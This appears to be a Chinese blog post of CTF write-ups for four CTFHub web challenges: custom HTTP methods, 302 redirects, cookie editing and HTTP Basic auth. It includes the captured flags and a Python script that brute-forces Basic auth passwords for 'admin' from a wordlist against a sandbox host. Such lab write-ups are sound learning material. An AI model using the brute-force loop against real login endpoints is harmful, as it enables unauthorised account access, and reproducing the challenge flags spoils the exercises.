22.2.2

大年初二

0x01 ctfhub web 请求方式

  1. 是HTTP的各种方法的学习
  2. wp来自互联网
  3. 代码

    from urllib import request
    
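    # Send a request whose HTTP method is the non-standard verb "CTFHUB";
    # the method string given here is what urllib puts on the request line.
    req = request.Request(method='CTFHUB', url='http://challenge-42fddc686b43e68f.sandbox.ctfhub.com:10800/index.php')
    # Bound the wait with a timeout and close the connection once the body
    # has been read, instead of leaving the response object open.
    with request.urlopen(req, timeout=10) as res:
        print(res.read())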

0x02 ctfhub web 302跳转

  1. owo:curl 默认不会跟随 302 跳转(没有加 -L),所以直接请求 index.php,看起来 flag 就在跳转前的响应体里

    [root@oao ~]# curl http://challenge-66684d04baa09987.sandbox.ctfhub.com:10800/index.php
    ctfhub{e083eb87c1eb8f6f4cef2e23}

0x03 ctfhub web Cookie

  1. 用插件Edit this cookie改掉
  2. ctfhub{3d00d90799b8dc1b1d7b87ee}

0x04 ctfhub web 基础认证

  1. 不容易,ctfhub{130b2dd63035026a4958912f}
  2. 代码

    
    
    
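    # Load the candidate wordlist, one entry per line.
    # The context manager closes the file handle even if reading fails;
    # the original left it open for the lifetime of the script.
    with open('dic.dic','r',encoding="utf-8") as f:
      arr=f.readlines()
    # Remove newline characters from the ends of each line; any other
    # whitespace stays part of the entry.
    arr2=[line.strip('\n') for line in arr]
    
    print(arr2)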
    
    
    import requests
    import base64
    import time
    
    #import faker #pip install faker
    import asyncio
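    def get(str1):
      """Send one GET to the module-level ``url`` with HTTP Basic credentials.

      Args:
        str1: Credential pair in ``user:password`` form.

      Returns:
        The HTTP status code of the response, or ``None`` when both
        attempts fail with a requests-level error (timeout, connection
        error, ...).
      """
      # Basic auth is base64 *encoding* of "user:password", not encryption:
      # the header printed below is reversible by anyone who can read it.
      b64=base64.b64encode(str1.encode())
      headers = {'Authorization': 'Basic '+b64.decode()}
      # Two attempts in total, as in the original's nested try blocks.
      for _ in range(2):
        try:
          r = requests.get(url, headers=headers,timeout=2)
        except requests.RequestException:
          # Only network/HTTP-library failures are retried; a bare except
          # would also swallow KeyboardInterrupt and programming errors.
          continue
        print(headers['Authorization'])
        print(str(r)+str(r.status_code))
        return r.status_code
      print("oppos")
      return None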
    
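    url="http://challenge-3e6e821e7aab6f8b.sandbox.ctfhub.com:10800/flag.html"
    # Try each wordlist entry as the password for the fixed user "admin".
    # Basic auth itself puts no limit on failed attempts; lockout or rate
    # limiting on repeated 401s has to come from the server.
    for i in arr2:
      str1="admin:"+i
      status=get(str1)
      if status is None:
        # get() returns None when both of its attempts raised. That is a
        # transport failure, not an accepted credential, so say so instead
        # of ending the loop as if a non-401 answer had arrived.
        print("request failed, stopping at: "+str1)
        break
      if status != 401:
        # Any status other than 401 ends the run; get() already printed it.
        break
      time.sleep(0.01)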
    
    out:
    Basic YWRtaW46ZnVja21l
    <Response [401]>401
    Basic YWRtaW46Njk2OQ==
    <Response [200]>200
最后修改:2022 年 02 月 02 日